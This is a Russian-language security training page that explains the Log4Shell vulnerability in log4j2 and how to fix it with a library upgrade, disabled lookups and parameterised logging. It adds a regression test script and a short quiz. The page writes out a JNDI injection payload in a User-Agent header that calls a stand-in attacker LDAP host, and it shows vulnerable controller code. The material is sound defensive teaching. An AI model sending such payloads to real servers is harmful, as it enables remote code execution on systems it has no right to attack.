Bug2Lab — Уязвимый log4j (Log4Shell / JNDI инъекция)

Уязвимый log4j (Log4Shell / JNDI инъекция)

Приложение логирует сырые данные из запроса. Уязвимая версия log4j2 интерпретирует строку как команду JNDI-запроса. Это может привести к удалённому выполнению кода. Исправление — обновить библиотеку и выключить опасные lookup’ы.

Как выглядит атака

Атакующий шлёт специальную строку в заголовке (например User-Agent), приложение честно пишет этот User-Agent в лог — и триггерит опасный lookup.

GET /api/payments
User-Agent: ${jndi:ldap://attacker.internal/a}

Сервер: 200 OK
(никто в проде даже не заметил)

Почему это стало возможным

У нас старая уязвимая версия log4j-core, и логирование делается прямо по внешнему вводу.

Проблемный код / pom.xml
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.14.1</version> 
</dependency>
// Controller.java
@GetMapping("/api/payments")
public ResponseEntity<?> getPayments(HttpServletRequest req){
    log.info("UA="+req.getHeader("User-Agent")); // ❌ логируем сырое
    return ResponseEntity.ok(List.of());
}

Как это чинится правильно

1) обновляем log4j до исправленной версии,
2) запрещаем небезопасные lookup’ы,
3) не логируем сырые внешние данные без нормализации.

Исправленный паттерн
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.17.1</version> 
</dependency>
// Controller.java
String ua = sanitize(req.getHeader("User-Agent"));
log.info("UA={}", ua); // ✅ параметризованное логирование, не строковая конкатенация

bug2regress Регрессионный тест (стоп-кран)

Тест шлёт заведомо опасную строку и следит, чтобы сервис не делал внезапных исходящих LDAP/HTTP-запросов наружу. Если фикс сломан и уязвимая логика «проснулась» — билд стопается.

#!/bin/bash # log4shell-check.sh set -e curl -s -H 'User-Agent: ${jndi:ldap://test-internal.local/a}' \ "https://staging.example.internal/api/payments" >/dev/null # наш агент-аудитор в стейдже пишет сетевую активность сервиса в файл last_egress.log if grep -qi "ldap://test-internal.local" /var/log/last_egress.log; then echo "[BLOCK] подозрительная внешняя JNDI-активность после запроса" exit 1 fi echo "[OK] сервис не пытался дернуть внешний JNDI по входной строке" exit 0

Это превращает урок «у нас был Log4Shell» в автоматическую гарантию: если кто-то вернёт уязвимую версию логгера — пайплайн взорвётся.

Проверка понимания Где корень риска?

Использовалась уязвимая версия log4j2, которая интерпретировала строку из запроса как JNDI-lookup.

Мы логировали пользовательский ввод без нормализации.

Проблема только в том, что мы не обрезали пробелы в User-Agent.

Фикс — обновить библиотеку и запретить опасные lookup’ы.

Стандарт: запрещено деплоить сервисы с уязвимыми версиями логгера. Это проверяется автоматически.

Теория (по желанию) Почему supply chain теперь — головная боль СТО

🧵 1. Что вообще произошло в Log4Shell?

Логгер — это инфраструктурная библиотека, она стоит в каждом микросервисе. Оказалось, что просто записав «странную строку» в лог, можно заставить приложение сходить куда-то наружу и выполнить нежелательный код. Это не «экзотика». Это массовый корпоративный инцидент по всему миру.

🏢 2. Почему это критично в корпе?

Это не про «одну конкретную ручку». Это сидит в 40+ сервисах сразу.
Это даёт потенциальный RCE (удалённый код) без логина.
Это очень хорошо индексируется сканерами в интернете (нашли за минуты).

То есть это не «дырка на админке», это «любая точка входа».

🕰 3. Почему это не умирает через неделю

В крупных компаниях куча легаси-сервисов, которые никто активно не трогает, но они всё ещё в проде. Они используют старые версии логгера. Их сложно «просто обновить завтра», потому что владелец сервиса уже уволился.

Поэтому мы делаем регресс-тест в пайплайне и политику «запрещённые версии».

📏 4. Новый стандарт команды

У нас есть список критичных CVE и запрещённых версий библиотек.
Пайплайн проверяет зависимости и стопает билд, если видит запрещённое.
Мы логируем пользовательский ввод только через безопасные плейсхолдеры {}, а не через слепую конкатенацию.

То есть защита не руками, а на уровне процесса.

✅ 5. Что можно сказать руководству

Да, класс уязвимости понятен команде.
Да, версии обновлены до безопасных.
Да, пайплайн дальше не пропустит эту проблему снова.

bug2regress Регрессионный тест (стоп-кран)

Проверка понимания Где корень риска?

Теория (по желанию) Почему supply chain теперь — головная боль СТО раскрыть

Теория (по желанию) Почему supply chain теперь — головная боль СТО